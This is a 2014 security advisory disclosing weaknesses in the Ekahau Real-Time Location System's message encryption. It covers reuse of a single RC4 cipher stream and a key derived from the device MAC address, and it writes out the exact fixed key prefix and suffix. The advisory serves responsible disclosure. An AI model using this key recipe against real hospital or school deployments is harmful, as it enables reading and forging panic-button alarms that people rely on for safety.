------------------------------
http://www.modzero.ch/
------------------------------
modzero Security Advisory: Vulnerabilities in Ekahau
Real-Time Location System [MZ-14-01] - CVE-ID: CVE-2014-2716
------------------------------
Table of Contents
1. Timeline
2. Summary
3. Vulnerabilities
4. Recommendations
5. Vendor Response
6. Credits
7. About modzero
8. References
9. Disclaimer
Vendor: Ekahau, Inc., Helsinki [1]
Products known to be affected: Ekahau Real-Time Location System [2]
The following products were used during the security analysis. Other
versions are likely to be affected as well:
* Ekahau B4 staff badge tag hardware rev 5.7, firmware rev 1.4.52 [3]
* Ekahau RTLS Controller version 6.0.5-FINAL
* Ekahau Activator 3 software [4]
------------------------------
1. Timeline
------------------------------
* 2014-03-04: Advisory sent to the vendor
* 2014-03-13: Vendor acknowledged the initial contact
* 2014-04-01: Vendor did not provide timeline
* 2014-04-02: modzero sends a preliminary summary to MITRE
* 2014-04-03: CVE received and added: CVE-2014-2716
* 2014-10-23: modzero releases the comprehensive security advisory to
the public
* 2014-12-15: Full release of the advisory to the public
------------------------------
2. Summary
------------------------------
Ekahau's real-time location tracking uses battery-powered Wi-Fi
tokens to track assets or staff. Signal measurements (RSSI) of the
802.11-based Wi-Fi communication are processed in the Ekahau RTLS
software component, which calculates the exact position of the token.
Depending on the token-model that is being used, additional
information can be exchanged (e.g. alarm events from the token or
custom text messages could be sent). According to the vendor's
website, the solution is used in hospitals and schools as "panic
buttons" and should simplify workflows, due to the ability to
precisely track persons and items. The solution only supports
Pre-Shared-Key (PSK) based radio transport layer encryption WPA2
schemes, every person with access to a token can get access to the
radio keys within a tag's EEPROM to gain access to the network and
sniff Ekahau data packets. As there is no easy way of key rotation,
it is assumed that the key is known to a large amount of individuals.
modzero found that the encryption used in Ekahau's Real-Time Location
System messages suffers from severe weaknesses. An attacker is able
to read and generate arbitrary messages including button events,
text/alarm messages or sending reconfiguration events.
------------------------------
3. Vulnerabilities
3.1. RC4 Cipher Stream Reuse
----------------------------
Severity: high
The message payload of the affected solution is always encrypted
using the same RC4 cipher stream. When combining two encrypted
messages with an XOR operation, the cipher stream will cancel out.
With this, an attacker is able to recover the bitwise difference of
two plain texts.
Encryption of two messages m1 and m2 using the same cipher stream s,
resulting in two ciphertexts c1 and c2. s is a pseudo-random sequence
of bytes, generated using the RC4 algorithm:
c1 = m1 XOR s
c2 = m2 XOR s
An attacker is able to record the ciphertexts c1 and c2 and combine
them in an XOR operation. This reveals all bits, where the plaintexts
m1 and m2 differ:
c1 XOR c2
= (m1 XOR s) XOR (m2 XOR s)
= (m1 XOR m2) XOR (s XOR s)
= m1 XOR m2
3.2. Weak Key Derivation
------------------------
Severity: high
The 128 bit RC4 key used in the Ekahau setup is trivially derived
from the three least significant bytes of the MAC address. The key
derivation scheme can be recovered from publicly available program
code [4] or any Ekahau tag's EEPROM.
According to the IEEE 802.11 standard [5], the MAC address is
required to be publicly transported in clear text within the 802.11
MAC headers. An attacker capable of sniffing the wireless network
(independant of its encryption state) is able to extract this
information. Using the gathered MAC address, he is able to
immediately reconstruct the employed RC4 key in the following way:
prefix = "*ixpiyacoc"
mac[3:5] = three least significant bytes of the MAC address
suffix = "+*+"
key = prefix | mac[3:5] | suffix
The effective key entropy is only 24 bit, thus even a key recovery by
brute-force search would be possible in a short amount of time if the
MAC address is unknown.
------------------------------
4. Recommendations
------------------------------
It is recommended that Ekahau corrects their implementation to ensure
message confidentiality, authenticity and integrity. it is
recommended to protect secret information and prevent access to key
material on all levels. Static PSK based radio encryption without
automated key rotation is not recommended.
------------------------------
5. Vendor Response
------------------------------
Qualified vendor response pending. Vendor protects the activator
download [4] with a login & password. The software might still be
available from other sources.
------------------------------
6. Credits
------------------------------
* David Gullasch (dagu (_at_) modzero.ch)
* Max Moser (mmo (_at_) modzero.ch)
------------------------------
7. About modzero
------------------------------
The independent Swiss company modzero AG assists clients with
security analysis in the complex areas of computer technology. The
focus lies on highly detailed technical analysis of concepts,
software and hardware components as well as the development of
individual solutions. Colleagues at modzero AG work exclusively in
practical, highly technical computer-security areas and can draw on
decades of experience in various platforms, system concepts, and
designs.
http://modzero.ch
info@modzero.ch
------------------------------
8. References
------------------------------
[1] http://www.ekahau.com/
[2] http://www.ekahau.com/real-
[3] http://www.ekahau.com/
B4_datasheet_letter.pdf
[4] http://sw.ekahau.com/download/
------------------------------
9. Disclaimer
------------------------------
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
Komentarų nėra:
Rašyti komentarą